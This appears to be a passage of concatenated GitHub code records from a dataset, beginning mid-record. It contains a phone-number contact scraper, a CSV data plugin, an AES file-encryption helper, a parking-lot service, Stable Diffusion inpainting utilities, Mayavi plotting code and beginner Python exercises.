numbers', 'email'])\n\n\ndef searchRegex(page_src, url):\n global df\n pattern = re.compile(r\"(\\([0-9]{3}\\)\\s?|[0-9]{3}-)[0-9]{3}-[0-9]{4}\")\n phone_num = re.search(pattern, page_src)\n\n if phone_num: \n print(f'Found: {phone_num.group()} from {url} using regex')\n \n new_row = {'website': url, 'phone numbers': phone_num.group()}\n df = df.append(new_row, ignore_index=True)\n else:\n print(f'NOT FOUND at {url} using regex')\n new_row = {'website': url, 'phone numbers': 'NOT FOUND'}\n df = df.append(new_row, ignore_index=True)\n\ndef getData(url):\n global df\n try:\n phone_num_elem = driver.find_element_by_css_selector('a[href^=\"tel:\"')\n phone_num = phone_num_elem.get_attribute('href')\n # phone_num = phone_num_elem.get_attribute('innerText')\n\n except NoSuchElementException:\n print(\"can't find phone number using a tag\")\n searchRegex(driver.page_source, url)\n\n else:\n print(f'Found: {phone_num} from {url} using css selector')\n\n new_row = {'website': url, 'phone numbers': phone_num}\n df = df.append(new_row, ignore_index=True)\n\ndef main(): \n global df\n f = open('websites.json')\n data = json.load(f)\n\n websites = data['websites']\n url = 'https://www.arronco.com/'\n # for url in websites:\n print(url)\n driver.get(url)\n\n try: \n contact_button = 
driver.find_element_by_xpath(\"//a[./span[contains(text(),'CONTACT') or contains(text(),'Contact')]] | //a[contains(text(),'CONTACT') or contains(text(),'Contact')]\")\n except NoSuchElementException:\n print(\"Can't find the contact button\")\n getData(url)\n else:\n contact_link = contact_button.get_attribute('href')\n print(contact_link)\n try:\n driver.get(contact_link)\n except Exception as e:\n print('An exception occured: ', e)\n driver.get(url)\n getData(url)\n else:\n getData(contact_link)\n \n # pprint.pprint(df)\n # df.to_excel(\"websites_data_tes.xlsx\")\n driver.quit()\n\nif __name__ == \"__main__\":\n main()","repo_name":"robor-systems/custom-scrappers","sub_path":"selenium/contact_info_SIS/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16381990689","text":"\"\"\"\nThis module provides the functionality to \nread and write CSV files from FC data. \n\"\"\"\nfrom data.io import FILE_INPUT, FILE_OUTPUT\nfrom display.dialogs import ValidatedDialog\nfrom plugins.pluginbase import IOPlugin \n\nfrom numpy import loadtxt\nimport wx\n\nimport csv\n\n__all__ = ['register_csv']\n\nclass CSVPlugin(IOPlugin):\n \"\"\"Read and write CSV files.\"\"\"\n def __init__(self, filename=None, fcData=None, window=None):\n super(CSVPlugin, self).__init__(filename, fcData, window)\n \n def register(self):\n return {FILE_INPUT: self.load, FILE_OUTPUT: self.save}\n \n @property\n def FileType(self):\n return 'Comma Separated Values (*.csv)|*.csv' \n \n def load(self):\n \"\"\"\n Load the specified FACS data file. It is assumed that the first line\n of the file contains the column labels.\n \n @type filename: string\n @param filename: The name of the FACS data file to be loaded\n \n @rtype: tuple\n @return: A tuple containing a list of column labels and numpy array \n containing the actual FACS data.\n \"\"\"\n # display options dialog first\n delim = ','\n skiprows = 1\n commentChar = '#'\n dlg = CSVOptionsDialog(self.window)\n if dlg.ShowModal() == wx.ID_OK:\n delim = dlg.Delimiter\n skiprows = dlg.HeaderLineNumber\n commentChar = dlg.CommentCharacter\n dlg.Destroy() \n \n # Retrieve first line of column labels\n with open(self.filename,'r') as fcFile:\n for i, line in enumerate(fcFile):\n if i < skiprows:\n labels = line\n else:\n break\n labels = labels.rstrip().replace('\"','').replace(\"'\",'').split(delim)\n \n # load actual data\n try:\n data = loadtxt(self.filename, comments=commentChar, delimiter=delim, skiprows=skiprows)\n except Exception:\n wx.MessageBox(\"Please ensure there are no missing values and that correct values for the CSV options were specified.\",\n \"Data Loading Error\", wx.OK | wx.ICON_ERROR)\n return\n \n # text annotations\n textAnn = {'file name': self.filename}\n textAnn['events'] = len(data)\n \n return (labels, data, {'text': textAnn})\n \n else:\n dlg.Destroy() \n\n\n \n def save(self):\n \"\"\"\n Save the supplied Flow Cytometry data to a comma separated value file.\n \"\"\"\n writer = csv.writer(open(self.filename, 'w'), delimiter=',')\n writer.writerow(self.fcData.labels)\n writer.writerows(self.fcData.data)\n \n \n \nimport display.formatters as f\n\nclass CSVOptionsDialog(ValidatedDialog):\n def __init__(self, parent):\n wx.Dialog.__init__(self, parent, wx.ID_ANY, 'CSV File Import Options', size=(250, 200))\n self.CenterOnParent()\n \n # form controls\n self.txtHeaderLine = wx.TextCtrl(self, wx.ID_ANY, '1', size=(50,20))\n 
self.txtCommentChar = wx.TextCtrl(self, wx.ID_ANY, '#', size=(50,20))\n self.txtDelimiter = wx.TextCtrl(self, wx.ID_ANY, ',', size=(50,20))\n \n # create a table of label-input controls\n self.formSizer = wx.GridSizer(3, 2, vgap=20)\n self.formSizer.Add(wx.StaticText(self, wx.ID_ANY, 'Header line number:'), 1, wx.EXPAND | wx.ALIGN_RIGHT)\n self.formSizer.Add(self.txtHeaderLine, 1)\n self.formSizer.Add(wx.StaticText(self, wx.ID_ANY, 'Comment character:'), 1, wx.EXPAND | wx.ALIGN_RIGHT)\n self.formSizer.Add(self.txtCommentChar, 1)\n self.formSizer.Add(wx.StaticText(self, wx.ID_ANY, 'Delimiter:'), 1, wx.EXPAND | wx.ALIGN_RIGHT)\n self.formSizer.Add(self.txtDelimiter, 1)\n \n # create the button row\n self.buttonSizer = self.CreateButtonSizer(wx.OK | wx.CANCEL | wx.HELP)\n self.buttonSizer.AffirmativeButton.Bind(wx.EVT_BUTTON, super(CSVOptionsDialog, self).cmdOK_click)\n self.buttonSizer.HelpButton.Bind(wx.EVT_BUTTON, self.cmdHelp_Click)\n \n # main sizer\n self.sizer = wx.BoxSizer(wx.VERTICAL)\n self.sizer.Add(self.formSizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 20)\n self.sizer.Add(self.buttonSizer, 0, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP | wx.BOTTOM, 20)\n self.SetSizer(self.sizer)\n \n \n @property\n def CommentCharacter(self):\n return self.txtCommentChar.Value\n \n @property\n def Delimiter(self):\n return self.txtDelimiter.Value\n \n @property\n def HeaderLineNumber(self):\n return int(self.txtHeaderLine.Value)\n\n def validate(self):\n intVal = f.IntFormatter()\n msg = []\n \n if not intVal.validate(self.txtHeaderLine.Value):\n msg.append(\"Header line number: A valid number must be entered.\")\n elif int(self.txtHeaderLine.Value) <= 0:\n msg.append(\"Header line number: Please enter a number larger than 0.\")\n \n return msg\n \n \n def cmdHelp_Click(self, event):\n from display.help import HelpDialog\n HelpDialog(self, \"CSV Import Help\", htmlfile=\"help/csv_import.html\", size=(300,200)).Show()\n\n\ndef register_csv():\n return ('csv', CSVPlugin)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"smdabdoub/find","sub_path":"plugins/IO/csv_io.py","file_name":"csv_io.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21486354298","text":"\"\"\"Problema 3.2\"\"\"\n\"\"\"Verificar se um numero eh triangular\"\"\"\nprint(\"Dado um numero inteiro, esse algoritmo verifica se ele eh triangular\")\nn = int(input(\"digite o valor de n:\"))\ni = 1\nwhile i * (i + 1) * (i + 2) < n:\n i = i + 1\nif i * (i + 1) * (i + 2) == n:\n print(\">>> %d eh o produto %d %d %d\" % (n, i, i + 1, i + 2))\n print(\"Portanto\", n, \"eh triangular\")\nelse:\n print((\"%d nao eh triangular\") % (n))\nfim = input(\"tecle enter para encerrar\")\n","repo_name":"Gui-FernandesBR/MAC2166-2018","sub_path":"examples/2_ints/Problem3.2.py","file_name":"Problem3.2.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23824300618","text":"#!/usr/bin/python\n# -*- coding: UTF-8\n\noutFile = \"./stu_eu_layer_grid.csv\"\n#sidFile = \"./hermes/soil_lookup.csv\"\nlat_lon_up = (51.959284, 13.928282)\nlat_lon_down = (51.795406, 14.160063)\n\ndef findAllSoilRef() :\n\n outSet = set()\n with open(outFile) as sourcefile:\n #Column_,Row,Grid_Code,Location,elevation,latitude,longitude,soil_ref\n firstLine = True\n header = dict()\n for line in sourcefile:\n if firstLine :\n firstLine = False\n 
header = ReadHeader(line)\n continue\n\n out = loadLine(line)\n latitude = float(out[header[\"latitude\"]])\n longitude = float(out[header[\"longitude\"]])\n soil_ref = out[header[\"soil_ref\"]]\n\n if latitude <= lat_lon_up[0] and latitude >= lat_lon_down[0] and longitude >= lat_lon_up[1] and longitude <= lat_lon_down[1] :\n outSet.add(soil_ref)\n\n # with open(sidFile) as sourcefile:\n # #soil_ref,SID\n # firstLine = True\n # header = dict()\n # for line in sourcefile:\n # if firstLine :\n # firstLine = False\n # header = ReadHeader(line)\n # continue\n # out = loadLine(line)\n # soil_ref = out[header[\"soil_ref\"]]\n # SID = out[header[\"SID\"]]\n # if soil_ref in outSet :\n # print(soil_ref, SID )\n \n outList = sorted(outSet)\n #print(outList)\n for item in outList :\n print(item)\n\n\ndef ReadHeader(line) : \n colDic = dict()\n tokens = line.split(\",\")\n i = -1\n for token in tokens :\n token = token.strip()\n i = i+1\n colDic[token] = i\n return colDic\n\ndef loadLine(line) :\n # read relevant content from line \n tokens = line.split(\",\")\n numCOl = len(tokens) \n out = [\"\"] * (numCOl)\n for i in range(numCOl):\n out[i] = tokens[i].strip()\n return out\n\nif __name__ == \"__main__\":\n findAllSoilRef()","repo_name":"zalf-rpm/soybean-EU","sub_path":"getgrid_window_by_lat_lon.py","file_name":"getgrid_window_by_lat_lon.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"5628158856","text":"import zlib\nimport struct\nfrom Crypto.Cipher import AES\n\n\nclass cryptography:\n def __init__(self, parent=None):\n return None\n\n def _lazysecret( self, secret, blocksize=32, padding='}'):\n \"\"\"pads secret if not legal AES block size (16, 24, 32)\"\"\"\n if not len(secret) in (16, 24, 32):\n return secret + (blocksize - len(secret)) * padding\n return secret\n\n def encrypt( self, plaintext, secret, lazy=True, checksum=True):\n \"\"\"encrypt plaintext with secret\n plaintext - content to encrypt\n secret - secret to encrypt plaintext\n lazy - pad secret if less than legal blocksize (default: True)\n checksum - attach crc32 byte encoded (default: True)\n returns ciphertext\n \"\"\"\n secret = self._lazysecret(secret) if lazy else secret\n encobj = AES.new(secret, AES.MODE_CFB)\n if checksum:\n plaintext += struct.pack(\"i\", zlib.crc32(plaintext))\n return encobj.encrypt(plaintext)\n \n def decrypt( self, ciphertext, secret, lazy=True, checksum=True):\n \"\"\"decrypt ciphertext with secret\n ciphertext - encrypted content to decrypt\n secret - secret to decrypt ciphertext\n lazy - pad secret if less than legal blocksize (default: True)\n checksum - verify crc32 byte encoded checksum (default: True)\n returns plaintext\n \"\"\"\n secret = self._lazysecret(secret) if lazy else secret\n encobj = AES.new(secret, AES.MODE_CFB)\n plaintext = encobj.decrypt(ciphertext)\n if checksum:\n crc, plaintext = (plaintext[-4:], plaintext[:-4])\n if not crc == struct.pack(\"i\", zlib.crc32(plaintext)):\n raise CheckSumError(\"checksum mismatch\")\n return plaintext\n\n def encrypt_file( self, input_filename, output_filename, secret_key):\n file_input = open(input_filename, 'r')\n z = self.encrypt( file_input.read(), secret_key )\n file_input.close()\n file_output = open( output_filename, 'w')\n file_output.write(z)\n file_output.close()\n\n def decrypt_file( self, input_filename, output_filename, secret_key):\n file_input = open(input_filename, 'r')\n z = self.decrypt( file_input.read(), secret_key 
)\n file_input.close()\n file_output = open( output_filename, 'w')\n file_output.write(z)\n file_output.close()\n\nclass CheckSumError(Exception):\n pass\n\n","repo_name":"rohit01/stegosoft","sub_path":"StegoSoft/Project_folder/cryptography.py","file_name":"cryptography.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8395695422","text":"import traceback\n\nfrom automated_parking_system import constants\nfrom automated_parking_system.models.parking_slot import ParkingSlot\nfrom automated_parking_system.services.base_service import BaseService\n\n\nclass ParkingSlotService(BaseService):\n @classmethod\n def initialize_slots(cls, parking_obj):\n try:\n n = len(parking_obj.slots)\n for i in range(0, n):\n parking_obj.slots[i] = ParkingSlot(i+1)\n return parking_obj\n except Exception as e:\n print(\"Exception in initializing slots \", traceback.print_exc(),\n e)\n return None\n\n @classmethod\n def park_car_at_slot(cls, slot_obj, car):\n try:\n slot_obj.set_car(car)\n slot_obj.set_status(constants.FULL)\n except Exception as e:\n print(\"Exception in initializing parking car at a slot %s \", slot_obj.slot_id,\n traceback.print_exc(),e)\n raise e\n\n @classmethod\n def vacate_slot(cls, slot_obj):\n try:\n slot_obj.set_car(None)\n slot_obj.set_status(constants.EMPTY)\n except Exception as e:\n print(\"Exception in initializing parking car at a slot %s \", slot_obj.slot_id,\n traceback.print_exc(), e)\n raise e\n\n @classmethod\n def update_slot_status(cls, slot_obj, status):\n slot_obj.set_status(status)\n\n @classmethod\n def get_slot_status(cls, slot_obj):\n return slot_obj.status\n\n","repo_name":"snehilrastogi/low_level_design","sub_path":"parkinglot/automated_parking_system/services/parking_slot_service.py","file_name":"parking_slot_service.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11904353781","text":"inventory={}\nadd=0\nctr=0\nstonks=0\nrefer=[\"shoes\",\"socks\",\"belts\",\"shiners\",\"bags\"]\ns=int(input())\nfor i in range(0,s):\n item=input()\n icost=float(input())\n istock=int(input())\n inventory[item]=(icost,istock)\n add=add+(icost*istock)\n stonks+=istock\nfor i in refer:\n if ctr==len(inventory):\n break\n tempVal=inventory[i]\n cost,stock=tempVal[0],tempVal[1]\n tot=cost*stock\n print(i)\n print('%.2f'%tot)\n ctr+=1\nprint(stonks)\nprint('%.2f'%add)\n","repo_name":"Shantanu1890/the-Qs-and-the-As","sub_path":"Python/shops.py","file_name":"shops.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16114410853","text":"#ex 1\n\nmy_fav_numbers = {3, 7, 9, 15, 42}\n\nmy_fav_numbers.add(11)\nmy_fav_numbers.add(23)\n\nmy_fav_numbers.pop()\n\nfriend_fav_numbers = {4, 8, 12, 16, 20}\n\nour_fav_numbers = my_fav_numbers.union(friend_fav_numbers)\n\nprint(\"Our favorite numbers:\", our_fav_numbers)\n\n#ex 2\n\noriginal_tuple = (1, 2, 3)\nnew_elements = (4, 5)\n\nnew_tuple = original_tuple + new_elements\n\nprint(new_tuple)\n\n#ex 3\nbasket = [\"Banana\", \"Apples\", \"Oranges\", \"Blueberries\"]\n\nbasket.remove(\"Banana\")\n\nbasket.remove(\"Blueberries\")\n\nbasket.append(\"Kiwi\")\n\nbasket.insert(0, \"Apples\")\n\napple_count = basket.count(\"Apples\")\n\nprint(\"Number of Apples in the basket:\", apple_count)\n\nbasket.clear()\n\nprint(\"Basket after emptying:\", 
basket)\n\n#ex 4\n\nsequence = [x * 0.5 for x in range(3, 11)]\nprint(sequence)\n\n\n#ex 5\n\nfor number in range(1, 21):\n print(number)\n\n\nfor number in range(1, 21):\n if number % 2 == 0:\n print(number)\n\n\n#ex 6\n\nmy_name = \"Vlad\"\n\nwhile True:\n user_name = input(\"Please enter your name: \")\n\n if user_name == my_name:\n print(\"Hey, that's my name too!\")\n break\n\n#ex 7\n\nfavorite_fruits_input = input(\"Enter your favorite fruits, separated by a space: \")\n\nfavorite_fruits = favorite_fruits_input.split()\n\nchosen_fruit = input(\"Enter the name of a fruit: \")\n\nif chosen_fruit in favorite_fruits:\n print(\"You chose one of your favorite fruits! Enjoy!\")\nelse:\n print(\"You chose a new fruit. I hope you enjoy.\")\n\n#ex 8\n\ntoppings = []\ntopping_price = 2.5\nbase_price = 10\n\nprint(\"Please enter toppings for your pizza. Enter 'quit' when you are done.\")\n\nwhile True:\n topping = input(\"Add a topping: \")\n\n if topping.lower() == 'quit':\n break\n\n toppings.append(topping)\n print(f\"{topping} added to your pizza!\")\n\ntotal_price = base_price + topping_price * len(toppings)\n\nprint(\"\\nYour pizza toppings are:\")\nfor t in toppings:\n print(f\" - {t}\")\n\nprint(f\"Total price: ${total_price:.2f}\")\n\n#ex 9\n\nnum_family_members = int(input(\"How many family members are there? \"))\n\ntotal_cost = 0\n\nfor i in range(num_family_members):\n age = int(input(f\"Enter the age of family member {i+1}: \"))\n if age < 3:\n continue\n elif 3 <= age <= 12:\n total_cost += 10\n else:\n total_cost += 15\n\nprint(f\"The total cost for the family's tickets is: ${total_cost}\")\n\nteenagers = [\"Alice\", \"Bob\", \"Charlie\", \"Diana\", \"Ethan\"]\n\nallowed_to_watch = []\n\n\nfor teen in teenagers:\n age = int(input(f\"Enter the age of {teen}: \"))\n if 16 <= age <= 21:\n allowed_to_watch.append(teen)\n\n\nprint(\"Teenagers allowed to watch the movie:\", allowed_to_watch)\n\n#ex 10\n\nsandwich_orders = [\"Tuna sandwich\", \"Pastrami sandwich\", \"Avocado sandwich\", \"Pastrami sandwich\", \"Egg sandwich\", \"Chicken sandwich\", \"Pastrami sandwich\"]\n\nwhile \"Pastrami sandwich\" in sandwich_orders:\n sandwich_orders.remove(\"Pastrami sandwich\")\n\nfinished_sandwiches = []\n\nfor sandwich in sandwich_orders:\n print(f\"I made your {sandwich.lower()}\")\n finished_sandwiches.append(sandwich)\n\nprint(\"\\nAll sandwiches made:\")\nfor sandwich in finished_sandwiches:\n print(sandwich)\n\n\n","repo_name":"vladislavkleiman/DI_Bootcamp","sub_path":"week_18/day_4/ex_xp.py","file_name":"ex_xp.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31993599275","text":"import os\nimport cv2\nimport sys\nimport glob\nimport argparse\nimport torch\nimport numpy as np\nimport PIL.Image as Image\nfrom pathlib import Path\nfrom diffusers import StableDiffusionInpaintPipeline\nfrom diffusers import DPMSolverMultistepScheduler\nfrom matplotlib import pyplot as plt\nfrom typing import Tuple\nprint(f\"model load info : StableDiffusion model load success\")\ndef resize_and_pad(image: np.ndarray, mask: np.ndarray, target_size: int = 512) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Resizes an image and its corresponding mask to have the longer side equal to `target_size` and pads them to make them\n both have the same size. 
The resulting image and mask have dimensions (target_size, target_size).\n\n Args:\n image: A numpy array representing the image to resize and pad.\n mask: A numpy array representing the mask to resize and pad.\n target_size: An integer specifying the desired size of the longer side after resizing.\n\n Returns:\n A tuple containing two numpy arrays - the resized and padded image and the resized and padded mask.\n \"\"\"\n height, width, _ = image.shape\n max_dim = max(height, width)\n scale = target_size / max_dim\n new_height = int(height * scale)\n new_width = int(width * scale)\n image_resized = cv2.resize(image, (new_width, new_height), interpolation=cv2.INTER_LINEAR)\n mask_resized = cv2.resize(mask, (new_width, new_height), interpolation=cv2.INTER_LINEAR)\n pad_height = target_size - new_height\n pad_width = target_size - new_width\n top_pad = pad_height // 2\n bottom_pad = pad_height - top_pad\n left_pad = pad_width // 2\n right_pad = pad_width - left_pad\n image_padded = np.pad(image_resized, ((top_pad, bottom_pad), (left_pad, right_pad), (0, 0)), mode='constant')\n mask_padded = np.pad(mask_resized, ((top_pad, bottom_pad), (left_pad, right_pad)), mode='constant')\n return image_padded, mask_padded, (top_pad, bottom_pad, left_pad, right_pad)\n\ndef recover_size(image_padded: np.ndarray, mask_padded: np.ndarray, orig_size: Tuple[int, int], \n padding_factors: Tuple[int, int, int, int]) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Resizes a padded and resized image and mask to the original size.\n\n Args:\n image_padded: A numpy array representing the padded and resized image.\n mask_padded: A numpy array representing the padded and resized mask.\n orig_size: A tuple containing two integers - the original height and width of the image before resizing and padding.\n\n Returns:\n A tuple containing two numpy arrays - the recovered image and the recovered mask with dimensions `orig_size`.\n \"\"\"\n h,w,c = image_padded.shape\n top_pad, bottom_pad, left_pad, right_pad = padding_factors\n image = image_padded[top_pad:h-bottom_pad, left_pad:w-right_pad, :]\n mask = mask_padded[top_pad:h-bottom_pad, left_pad:w-right_pad]\n image_resized = cv2.resize(image, orig_size[::-1], interpolation=cv2.INTER_LINEAR)\n mask_resized = cv2.resize(mask, orig_size[::-1], interpolation=cv2.INTER_LINEAR)\n return image_resized, mask_resized\n\ndef crop_for_filling_pre(image: np.array, mask: np.array, crop_size: int = 512):\n # Calculate the aspect ratio of the image\n height, width = image.shape[:2]\n aspect_ratio = float(width) / float(height)\n\n # If the shorter side is less than 512, resize the image proportionally\n if min(height, width) < crop_size:\n if height < width:\n new_height = crop_size\n new_width = int(new_height * aspect_ratio)\n else:\n new_width = crop_size\n new_height = int(new_width / aspect_ratio)\n\n image = cv2.resize(image, (new_width, new_height))\n mask = cv2.resize(mask, (new_width, new_height))\n\n # Find the bounding box of the mask\n x, y, w, h = cv2.boundingRect(mask)\n\n # Update the height and width of the resized image\n height, width = image.shape[:2]\n\n # # If the 512x512 square cannot cover the entire mask, resize the image accordingly\n if w > crop_size or h > crop_size:\n # padding to square at first\n if height < width:\n padding = width - height\n image = np.pad(image, ((padding // 2, padding - padding // 2), (0, 0), (0, 0)), 'constant')\n mask = np.pad(mask, ((padding // 2, padding - padding // 2), (0, 0)), 'constant')\n else:\n padding = height - width\n image = 
np.pad(image, ((0, 0), (padding // 2, padding - padding // 2), (0, 0)), 'constant')\n mask = np.pad(mask, ((0, 0), (padding // 2, padding - padding // 2)), 'constant')\n\n resize_factor = crop_size / max(w, h)\n image = cv2.resize(image, (0, 0), fx=resize_factor, fy=resize_factor)\n mask = cv2.resize(mask, (0, 0), fx=resize_factor, fy=resize_factor)\n x, y, w, h = cv2.boundingRect(mask)\n\n # Calculate the crop coordinates\n crop_x = min(max(x + w // 2 - crop_size // 2, 0), width - crop_size)\n crop_y = min(max(y + h // 2 - crop_size // 2, 0), height - crop_size)\n\n # Crop the image\n cropped_image = image[crop_y:crop_y + crop_size, crop_x:crop_x + crop_size]\n cropped_mask = mask[crop_y:crop_y + crop_size, crop_x:crop_x + crop_size]\n\n return cropped_image, cropped_mask\n \ndef crop_for_filling_post(\n image: np.array,\n mask: np.array,\n filled_image: np.array, \n crop_size: int = 512,\n ):\n image_copy = image.copy()\n mask_copy = mask.copy()\n # Calculate the aspect ratio of the image\n height, width = image.shape[:2]\n height_ori, width_ori = height, width\n aspect_ratio = float(width) / float(height)\n\n # If the shorter side is less than 512, resize the image proportionally\n if min(height, width) < crop_size:\n if height < width:\n new_height = crop_size\n new_width = int(new_height * aspect_ratio)\n else:\n new_width = crop_size\n new_height = int(new_width / aspect_ratio)\n\n image = cv2.resize(image, (new_width, new_height))\n mask = cv2.resize(mask, (new_width, new_height))\n\n # Find the bounding box of the mask\n x, y, w, h = cv2.boundingRect(mask)\n\n # Update the height and width of the resized image\n height, width = image.shape[:2]\n\n # # If the 512x512 square cannot cover the entire mask, resize the image accordingly\n if w > crop_size or h > crop_size:\n flag_padding = True\n # padding to square at first\n if height < width:\n padding = width - height\n image = np.pad(image, ((padding // 2, padding - padding // 2), (0, 0), (0, 0)), 'constant')\n mask = np.pad(mask, ((padding // 2, padding - padding // 2), (0, 0)), 'constant')\n padding_side = 'h'\n else:\n padding = height - width\n image = np.pad(image, ((0, 0), (padding // 2, padding - padding // 2), (0, 0)), 'constant')\n mask = np.pad(mask, ((0, 0), (padding // 2, padding - padding // 2)), 'constant')\n padding_side = 'w'\n\n resize_factor = crop_size / max(w, h)\n image = cv2.resize(image, (0, 0), fx=resize_factor, fy=resize_factor)\n mask = cv2.resize(mask, (0, 0), fx=resize_factor, fy=resize_factor)\n x, y, w, h = cv2.boundingRect(mask)\n else:\n flag_padding = False\n\n # Calculate the crop coordinates\n crop_x = min(max(x + w // 2 - crop_size // 2, 0), width - crop_size)\n crop_y = min(max(y + h // 2 - crop_size // 2, 0), height - crop_size)\n\n # Fill the image\n image[crop_y:crop_y + crop_size, crop_x:crop_x + crop_size] = filled_image\n if flag_padding:\n image = cv2.resize(image, (0, 0), fx=1/resize_factor, fy=1/resize_factor)\n if padding_side == 'h':\n image = image[padding // 2:padding // 2 + height_ori, :]\n else:\n image = image[:, padding // 2:padding // 2 + width_ori]\n\n image = cv2.resize(image, (width_ori, height_ori))\n\n image_copy[mask_copy==255] = image[mask_copy==255]\n return image_copy\n\ndef fill_img_with_sd(\n img: np.ndarray,\n mask: np.ndarray,\n text_prompt: str,\n device=\"cuda\"\n):\n pipe = StableDiffusionInpaintPipeline.from_pretrained(\n \"stabilityai/stable-diffusion-2-inpainting\",\n torch_dtype=torch.float32,\n ).to(device)\n generator = 
torch.Generator(\"cuda\").manual_seed(0)\n pipe.scheduler = DPMSolverMultistepScheduler.from_config(pipe.scheduler.config)\n img_crop, mask_crop = crop_for_filling_pre(img, mask)\n img_crop_filled = pipe(\n prompt=text_prompt,\n image=Image.fromarray(img_crop),\n mask_image=Image.fromarray(mask_crop),\n generator=generator\n ).images[0]\n img_filled = crop_for_filling_post(img, mask, np.array(img_crop_filled))\n return img_filled\n\ndef replace_img_with_sd(\n img: np.ndarray,\n mask: np.ndarray,\n text_prompt: str,\n step: int = 50,\n device=\"cuda\"\n):\n pipe = StableDiffusionInpaintPipeline.from_pretrained(\n \"stabilityai/stable-diffusion-2-inpainting\",\n torch_dtype=torch.float32,\n ).to(device)\n img_padded, mask_padded, padding_factors = resize_and_pad(img, mask)\n generator = torch.Generator(\"cuda\").manual_seed(0)\n pipe.scheduler = DPMSolverMultistepScheduler.from_config(pipe.scheduler.config)\n img_padded = pipe(\n prompt=text_prompt,\n image=Image.fromarray(img_padded),\n mask_image=Image.fromarray(255 - mask_padded),\n num_inference_steps=step,\n generator=generator\n ).images[0]\n height, width, _ = img.shape\n img_resized, mask_resized = recover_size(\n np.array(img_padded), mask_padded, (height, width), padding_factors)\n mask_resized = np.expand_dims(mask_resized, -1) / 255\n img_resized = img_resized * (1-mask_resized) + img * mask_resized\n return img_resized","repo_name":"kangmin5133/demolab","sub_path":"service/stable_diffusion.py","file_name":"stable_diffusion.py","file_ext":"py","file_size_in_byte":9885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12811319655","text":"import mayavi.mlab as mlab\nimport numpy as np\nimport torch\n\nbox_colormap = [\n [1, 1, 1],\n [0, 1, 0],\n [0, 1, 1],\n [1, 1, 0],\n]\n\n\"\"\" def visualize_pts(pts, fig=None, bgcolor=(0, 0, 0), fgcolor=(1.0, 1.0, 1.0),\n show_intensity=False, size=(600, 600), draw_origin=True):\n if not isinstance(pts, np.ndarray):\n pts = pts.cpu().numpy()\n if fig is None:\n fig = mlab.figure(figure=None, bgcolor=bgcolor, fgcolor=fgcolor, engine=None, size=size)\n\n if show_intensity:\n G = mlab.points3d(pts[:, 0], pts[:, 1], pts[:, 2], pts[:, 3], mode='point',\n colormap='gnuplot', scale_factor=1, figure=fig)\n else:\n G = mlab.points3d(pts[:, 0], pts[:, 1], pts[:, 2], mode='point',\n colormap='gnuplot', scale_factor=1, figure=fig)\n if draw_origin:\n mlab.points3d(0, 0, 0, color=(1, 1, 1), mode='cube', scale_factor=0.2)\n mlab.plot3d([0, 3], [0, 0], [0, 0], color=(0, 0, 1), tube_radius=0.1)\n mlab.plot3d([0, 0], [0, 3], [0, 0], color=(0, 1, 0), tube_radius=0.1)\n mlab.plot3d([0, 0], [0, 0], [0, 3], color=(1, 0, 0), tube_radius=0.1)\n\n return fig \"\"\"\ndef visualize_pts( fig=None, bgcolor=(0, 0, 0), fgcolor=(1.0, 1.0, 1.0),\n show_intensity=False, size=(600, 600), draw_origin=True):\n if fig is None:\n fig = mlab.figure(figure=None, bgcolor=bgcolor, fgcolor=fgcolor, engine=None, size=size)\n return fig\n\ndef draw_grid(x1, y1, x2, y2, fig, tube_radius=None, color=(0.5, 0.5, 0.5)):\n mlab.plot3d([x1, x1], [y1, y2], [0, 0], color=color, tube_radius=tube_radius, line_width=1, figure=fig)\n mlab.plot3d([x2, x2], [y1, y2], [0, 0], color=color, tube_radius=tube_radius, line_width=1, figure=fig)\n mlab.plot3d([x1, x2], [y1, y1], [0, 0], color=color, tube_radius=tube_radius, line_width=1, figure=fig)\n mlab.plot3d([x1, x2], [y2, y2], [0, 0], color=color, tube_radius=tube_radius, line_width=1, figure=fig)\n return fig\n\ndef draw_multi_grid_range(fig, 
grid_size=20, bv_range=(-60, -60, 60, 60)):\n    for x in range(bv_range[0], bv_range[2], grid_size):\n        for y in range(bv_range[1], bv_range[3], grid_size):\n            fig = draw_grid(x, y, x + grid_size, y + grid_size, fig)\n\n    return fig\n\n\ndef draw_corners3d(corners3d, fig, color=(1, 1, 1), line_width=2, cls=None, tag='', max_num=500, tube_radius=None):\n    \"\"\"\n    :param corners3d: (N, 8, 3)\n    :param fig:\n    :param color:\n    :param line_width:\n    :param cls:\n    :param tag:\n    :param max_num:\n    :return:\n    \"\"\"\n    import mayavi.mlab as mlab\n    num = min(max_num, len(corners3d))\n    for n in range(num):\n        b = corners3d[n]  # (8, 3)\n\n        if cls is not None:\n            if isinstance(cls, np.ndarray):\n                mlab.text3d(b[6, 0], b[6, 1], b[6, 2], '%.2f' % cls[n], scale=(0.3, 0.3, 0.3), color=color, figure=fig)\n            else:\n                mlab.text3d(b[6, 0], b[6, 1], b[6, 2], '%s' % cls[n], scale=(0.3, 0.3, 0.3), color=color, figure=fig)\n\n      